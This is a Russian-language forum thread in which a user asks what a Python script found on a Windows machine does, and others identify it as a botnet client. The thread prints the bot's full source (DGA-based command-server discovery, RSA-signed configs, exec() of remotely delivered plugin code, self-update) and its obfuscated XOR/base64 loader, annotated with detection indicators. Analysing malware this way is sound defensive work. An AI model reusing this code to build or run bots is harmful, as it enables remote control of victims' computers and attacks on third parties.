Подскажите что делает код (python)

Discussion in 'Песочница' started by traceme, 16 Sep 2015.

  1. traceme

    Подскажите, пожалуйста, что делает этот код
    Code:
    import ctypes
    from ctypes import wintypes
    import subprocess
    from base64 import b64encode,b64decode
    import threading
    import traceback
    import hashlib
    import zipfile
    import urllib2
    import inspect
    import urllib
    import socket
    import shutil
    import ctypes
    import random
    import _winreg as winreg
    import types
    import json
    import time
    import rsa
    import sys
    import re
    import os
    # Win32 bindings used by `singleinstance` below:
    # CreateMutexA(lpMutexAttributes, bInitialOwner, lpName) and GetLastError().
    # Only these two functions are bound; `_CloseHandle`, which
    # singleinstance.__del__ calls, is never defined anywhere in this file.
    _CreateMutex=ctypes.windll.kernel32.CreateMutexA
    _CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
    _CreateMutex.restype=wintypes.HANDLE
    _GetLastError=ctypes.windll.kernel32.GetLastError
    _GetLastError.argtypes=[]
    # Declared as HANDLE although the Win32 API returns a DWORD; the value is only
    # compared with the integer 183 in singleinstance.aleradyrunning.
    _GetLastError.restype=wintypes.HANDLE
    # Single-instance guard based on a named Win32 mutex.  The fixed mutex name
    # 'multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}' is a host-based indicator
    # that can be searched for when triaging a machine.
    class singleinstance:
    # Creates (or opens) the named mutex and records GetLastError() immediately after.
    def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False,self.mutexname);self.lasterror=_GetLastError()
    # 183 is ERROR_ALREADY_EXISTS: a mutex of this name was already open, i.e.
    # another copy of the bot is running.
    def aleradyrunning(self):return self.lasterror==183
    # NOTE: `_CloseHandle` is not bound in this file, so this raises NameError when
    # the object is collected (Python reports and ignores exceptions from __del__);
    # the mutex handle is therefore never explicitly released.
    def __del__(self):
      if self.mutex:_CloseHandle(self.mutex)
    # Exits the process if another instance already holds the mutex.  The 1 s
    # sleep happens between creating the mutex and checking the error code.
    def chk_mutex():
    mutex=singleinstance();time.sleep(1)
    if mutex.aleradyrunning():sys.exit()
    # Thin wrapper around a urllib2 opener: optional HTTP proxy (plus a BasicAuth
    # handler) and optional cookie support.  The opener is installed globally via
    # urllib2.install_opener, so it affects every urllib2 call in the process.
    class Http:
    def __init__(self,proxy=False,cookie_support=False,ua=False):
      self.handlers=set()
      if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPBasicAuthHandler()])
      if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
      if self.handlers:self.interface=urllib2.build_opener(*self.handlers)
      else:self.interface=urllib2.build_opener(urllib2.BaseHandler)
      urllib2.install_opener(self.interface)
      # Hard-coded default User-Agent (Firefox 3.0.1 on Windows NT 5.1).  Every
      # caller in this file passes ua=False, so all of the sample's HTTP traffic
      # carries this string -- a usable network-side indicator.
      if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
      self.interface.addheaders=[('User-agent',ua)]
    # Builds the Request; `post` is accepted but unused.  Web.fetch passes referer
    # positionally, so it lands in `post` and the Referer header is never set.
    def prepare_request(self,url,post=False,referer=False):
      request=urllib2.Request(url)
      if referer:request.add_header('Referer',referer)
      return request
    # Http plus a per-request timeout (default 60 s).  fetch() sends a POST with the
    # urlencoded `data` when it is given, otherwise a GET, and returns the raw
    # urllib2 response object.
    class Web:
    def __init__(self,proxy=False,cookie_support=False,ua=False,timeout=60):self.timeout=timeout;self.web=Http(proxy,cookie_support,ua)
    def fetch(self,url,data=False,referer=False):
      # referer is passed positionally into prepare_request's `post` slot (see Http),
      # so no Referer header is ever added.
      request=self.web.prepare_request(url,referer)
      if data:data=urllib.urlencode(data);response=self.web.interface.open(request,data,timeout=self.timeout)
      else:response=self.web.interface.open(request,timeout=self.timeout)
      return response
    # Minimal stand-in mimicking the `requests` library API (post/get returning an
    # object with .text) on top of Web, so the bot needs no third-party HTTP
    # package.  Each call builds a fresh Web -> Http opener and re-installs it.
    class requests:
    # Holds the response body under .text, like a requests.Response.
    class texter:
      def __init__(self,text):self.text=text
    # POST (or GET when data is False) through the optional 'http' proxy.
    # Defaults of False mean: no proxy, and the hard-coded User-Agent from Http.
    @staticmethod
    def post(url,data=False,proxies=False,headers=False):
      if not proxies:proxies={'http':False}
      if not headers:headers={'User-Agent':False}
      resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
    # get() is post() without data, which Web.fetch turns into a GET.
    @staticmethod
    def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
    # Overwrites fname with data in binary mode (used by the self-update in main to
    # replace this script's own file).
    def file_put_contents(fname,data):
    with open(fname,'wb') as f:f.write(data)
    # Reads fname in binary mode and returns its full contents.  Not referenced
    # elsewhere in the visible file.
    def file_get_contents(fname):
    with open(fname,'rb') as f:return f.read()
    # Returns the text between tag1 and tag2 (non-greedy, newlines allowed), or ''
    # when there is no match.  This is the whole C2 "protocol": replies are plain
    # text carrying pseudo-XML tags such as <sign>, <data>, <main>, <ip>, <host>,
    # <path>, <sleep>, <py_head>, <modules> and <update>.  tag1/tag2 are inserted
    # into the regex without escaping.
    def extract_text(text,tag1,tag2):
    match=re.search('{}(.*?){}'.format(tag1,tag2),text,re.M|re.S)
    if match is None:return ''
    return match.group(1)
    # Machine fingerprint used as the bot id (the `k=` URL parameter in main): the
    # HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid value, lower-cased.  If the
    # registry read fails, falls back to the last token of `vol c:` output (the
    # volume serial number).  A MachineGuid read or a `vol` child process spawned
    # from a Python interpreter is worth flagging in endpoint telemetry.
    def get_hard_id():
    try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
    except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
    # Changes the process working directory (used by main and setup_import).
    def set_cur_dir(name):os.chdir(name)
    # Directory containing this script file (resolved through symlinks).
    def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
    # Nine characters from [a-z0-9] drawn with the `random` module.  Because
    # get_serv_data seeds `random` with a fixed constant, the sequence of labels
    # this produces is identical on every host -- the generation step of the DGA.
    def get_pseudo():
    alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseudo=''
    for i in range(9):pseudo=pseudo+random.choice(alpha)
    return pseudo
    # Checks that a C2 reply is signed by the operator's embedded RSA public key
    # (PKCS#1, base64-encoded; the key literal is elided on this page).  <sign> is
    # hex, <data> is base64; rsa.verify raises on mismatch and any exception yields
    # False.  For defenders: replies cannot be forged without the private key, but
    # the DGA candidates (see get_serv_data) can still be pre-computed and blocked.
    def chk_sign(text):
    result=False
    try:public_data='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';public_data=b64decode(public_data);pubkey=rsa.PublicKey.load_pkcs1(public_data.encode());sign=extract_text(text,'<sign>','</sign>');sign=sign.decode('hex');data=extract_text(text,'<data>','</data>');data=b64decode(data);result=rsa.verify(data,sign,pubkey)
    except Exception as e:result=False
    return result
    # Blocks until a TCP connection to google.com:80 succeeds (30 s connect
    # timeout, 2 s pause between attempts).  Pure connectivity probe: the socket
    # is closed immediately and nothing is sent.
    def wait_for_internet():
    is_internet=False
    while not is_internet:
      try:sock=socket.create_connection(('google.com',80),timeout=30);is_internet=True;sock.close()
      except Exception as e:print(e);time.sleep(2)
    # Turns a source string received from the C2 into a module object by exec()-ing
    # it into a fresh ModuleType namespace: arbitrary remote code execution by design.
    def import_code(code,name):module=types.ModuleType(name);exec(code,module.__dict__);return module
    # DGA-based C2 discovery.  `random` is seeded with the constant 538479483, so
    # get_pseudo() yields the same labels on every host.  Each 9-character label is
    # combined with each of the 45 suffixes below (TLDs and dynamic-DNS providers)
    # and http://<label><suffix>/<label>.txt is fetched; the first reply that
    # passes chk_sign wins.  The counter resets the seed after 100 outer
    # iterations, so only the first 100 labels are ever tried, cyclically.
    # From the signed <data> (base64) the <main> section gives the C2 proxy <ip>,
    # and the <host> and <path> used to build URLs in main.
    # Note that do_request(url,domain) uses the candidate domain itself as the HTTP
    # proxy for the request (see do_request / Http).
    # Detection: 100 labels x 45 suffixes is a fully reproducible set, which makes
    # DNS-side blocking or sinkholing straightforward.
    def get_serv_data():
    random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.net','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk','.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su','.do.am','.narod.ru','.3utilities.com','.bounceme.net','.ddns.net','.ddnsking.com','.gotdns.ch','.hopto.org','.myftp.biz','.myftp.org','.myvnc.com','.no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.com','.serveblog.net','.servecounterstrike.com','.serveftp.com','.servegame.com','.servehalflife.com','.servehttp.com','.serveminecraft.net','.servemp3.com','.servepics.com','.servequake.com','.sytes.net','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;iterator=0
    while loop:
      sub_domain=get_pseudo()
      for e in domains:
       domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain)
       if chk_sign(text):rsa_config=text;loop=False;break
      iterator+=1
      # Reset the generator so the same 100 labels are retried indefinitely.
      if iterator>=100:iterator=0;random.seed(538479483)
      time.sleep(2)
    # `text` here is the signed reply that ended the loop; its <data> payload is
    # decoded and parsed for the <main> block.
    rsa_config=extract_text(text,'<data>','</data>');rsa_config=b64decode(rsa_config);print(rsa_config);main_config=extract_text(rsa_config,'<main>','</main>');ip=extract_text(main_config,'<ip>','</ip>');host=extract_text(main_config,'<host>','</host>');path=extract_text(main_config,'<path>','</path>');return rsa_config,ip,host,path
    # HTTP helper for C2 traffic: `ip` becomes the HTTP proxy for the request;
    # POST when data is given, otherwise GET.  Every exception is swallowed and ''
    # returned, so callers cannot distinguish a network failure from an empty reply.
    def do_request(url,ip,data=False):
    try:
      proxy={'http':ip}
      if data:return requests.post(url,proxies=proxy,data=data).text
      return requests.get(url,proxies=proxy).text
    except Exception:return ''
    # Registry of plugin name -> module object created by import_code (see
    # run_new_module / stop_thread).
    alive_modules={}
    # exec()s the delivered plugin source as module `name`, registers it in
    # alive_modules, and starts a thread running the plugin's payload(module,
    # rsa_config).  Every plugin is therefore expected to define `payload`.
    def run_new_module(rsa_config,code,name):imported=import_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported.payload,args=(alive_modules[name],rsa_config));thread.start();return thread
    # `module` is the descriptor dict from <py_head> with a 'thread' entry attached
    # by main.  Calls the plugin's exit() and joins its thread.
    def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
    # Ensures a plugin dependency is importable.  `imp` is a dict from <py_head>
    # with 'name' and 'url'.  If __import__ succeeds nothing else happens.
    # Otherwise the zip at imp['url'] is downloaded (directly, no proxy) to
    # <name>.zip in the current directory, any existing <name> directory is
    # deleted, the archive is expanded with extractall() -- no path validation,
    # so archive entries dictate where files land -- and
    # `"<python>" -X:FullFrames setup.py install` is launched inside it via
    # os.popen (its output is never read, so the command is not waited on).
    # -X:FullFrames is an IronPython switch, consistent with post #3 saying the
    # original ran under IronPython.  Returns False on any error, True otherwise.
    def setup_import(imp):
    try:print(imp['name']);__import__(imp['name']);return
    except Exception as e:print(str(e))
    try:
      zip_s=requests.get(imp['url']).text
      with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
      try:shutil.rmtree(imp['name'])
      except Exception as e:print(e)
      with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
      set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
    except Exception as e:return False
    return True
    # Bot main loop.  Startup: 10 s delay, single-instance check, chdir to the
    # script's own directory, bot id from get_hard_id(), C2 discovery via the DGA.
    # Each cycle POSTs the hashes of the loaded modules (JSON) to
    #   http://<host><path>?h=jmscbcsrkvureutlepd&k=<bot id>&do=get_modules
    # through the <ip> proxy, then acts on the tagged reply:
    #   <sleep>    seconds until the next poll (default 7200)
    #   <update>   base64 replacement for this script file; written in place,
    #              relaunched with sys.executable (creationflags=8), then exit
    #   <py_head>  JSON list of module descriptors: name, imports[], load_mode, hash
    #   <modules>  per-module base64 source wrapped in <name>...</name>
    # Any exception (plus the raw reply) is reported back with do=traceback.
    # The literal 'jmscbcsrkvureutlepd' is the h= value of both URLs and is also
    # printed at startup; the URL pattern is a usable proxy/network indicator.
    def main():
    time.sleep(10);chk_mutex();rsa_config='';set_cur_dir(get_script_dir());bot_id=get_hard_id();print('jmscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip,adminka_host,adminka_path=get_serv_data();loaded_modules={}
    while True:
      # Report what is already loaded so the server can decide what to push.
      post_data={}
      for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
      req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);print(post_data);resp=do_request(req_url,adminka_ip,data={'modules':json.dumps(post_data)});sleep=extract_text(resp,'<sleep>','</sleep>')
      if not sleep:sleep='7200'
      exception_text=''
      try:
       modules_head=extract_text(resp,'<py_head>','</py_head>')
       if modules_head:modules_head=json.loads(modules_head)
       else:modules_head=[]
       modules_codes=extract_text(resp,'<modules>','</modules>');update_code=extract_text(resp,'<update>','</update>')
       # Self-update: overwrite this file with the server-supplied script, spawn it
       # with the same interpreter, and terminate this process.
       if update_code:print('Updating..');cur_script=os.path.realpath(__file__);code=b64decode(update_code);file_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
       for module in modules_head:
        print(module['name'])
        # An already-loaded module is stopped and dropped first, then re-loaded below.
        if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
        print('update imports');imports_result=True
        # Each dependency failure is recorded and skips the module entirely.
        for imp in module['imports']:
         if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
        if not imports_result:continue
        print('load module');module_code=extract_text(modules_codes,'<'+module['name']+'>','</'+module['name']+'>');module_code=b64decode(module_code);module_thread=0
        # Only load_mode=='thread' executes the code here; other modes are
        # recorded in loaded_modules with thread=0 but not run by this loop.
        if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,module_code,module['name'])
        loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
      except Exception as e:exception_text=exception_text+traceback.format_exc()
      # Error reporting: tracebacks and the raw reply go back to the C2.
      if len(exception_text)!=0:
       try:exception_text+='\n\n['+resp+']'
       except Exception as e:pass
       req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);do_request(req_url,adminka_ip,data={'trace':exception_text})
      # Poll interval is server-controlled; a non-integer <sleep> falls back to 7200 s.
      try:time.sleep(int(sleep))
      except Exception as e:time.sleep(7200)
    # Entry point when run as a script (post #3 says it is launched from autostart).
    if __name__=='__main__':main()
    
     
  2. Kaimi

    Выглядит как бот с DGA и асимметричным шифрованием
  3. traceme

    Спасибо! Если вам не сложно, подскажите: допустим, если этот скрипт запущен от имени администратора на Windows-системе — возможно ли хозяину ботнета послать команду на атаку FTP-сервера?
    Вот сам скрипт: изначально на IronPython, с обфускацией, запускается через автозагрузку
    Code:
    # Loader stage that wrapped the script in post #1 (obfuscated, run from
    # autostart under IronPython per post #3).  The hex payload literal has been
    # stripped on this page (empty string), so as shown it cannot run.
    import base64
    jdetiggavomna = ("").decode("hex")
    # 14-byte repeating XOR key, given as hex.
    nlkyoie = ("67696a6a767572646b6867726470").decode("hex");ahuqradfermy = "";uzvjjthhg=0
    # XOR-decodes 12856 payload bytes, cycling the key index every 14 bytes.
    for fipzhkvresaeg in range(12856):
        ahuqradfermy = ahuqradfermy + chr(ord(jdetiggavomna[fipzhkvresaeg]) ^ ord(nlkyoie[uzvjjthhg]))
        uzvjjthhg = uzvjjthhg + 1
        if uzvjjthhg >= 14:
            uzvjjthhg = 0
    # The XOR output is base64 of the bot source, which is exec()'d in place.
    # NOTE: `b64decode` is not imported here (only `import base64`), so this line as
    # pasted would raise NameError; presumably the original used base64.b64decode.
    hwblqemivvbfqf = b64decode(ahuqradfermy)
    exec(hwblqemivvbfqf)

    Т.е. приведённый в первом посте код — это результат base64-декодирования скрипта из спойлера

    UPD
    Может, поможет в моём вопросе: системный DNS установлен абсолютно левый — не провайдера и даже не Google; судя по адресу, расположен в Украине
     
  4. Kaimi

    Именно хозяину ботнета или может ли хозяин ботнета?
  5. traceme

    Второй вариант. Может ли хозяин ботнета атаковать чужие FTP через компьютеры, где запустили этот скрипт?
     
  6. Kaimi

    Бот умеет подгружать произвольные модули, так что владелец может делать что угодно
  7. traceme

    Вы мне очень сильно помогли, спасибо Вам огромное!
     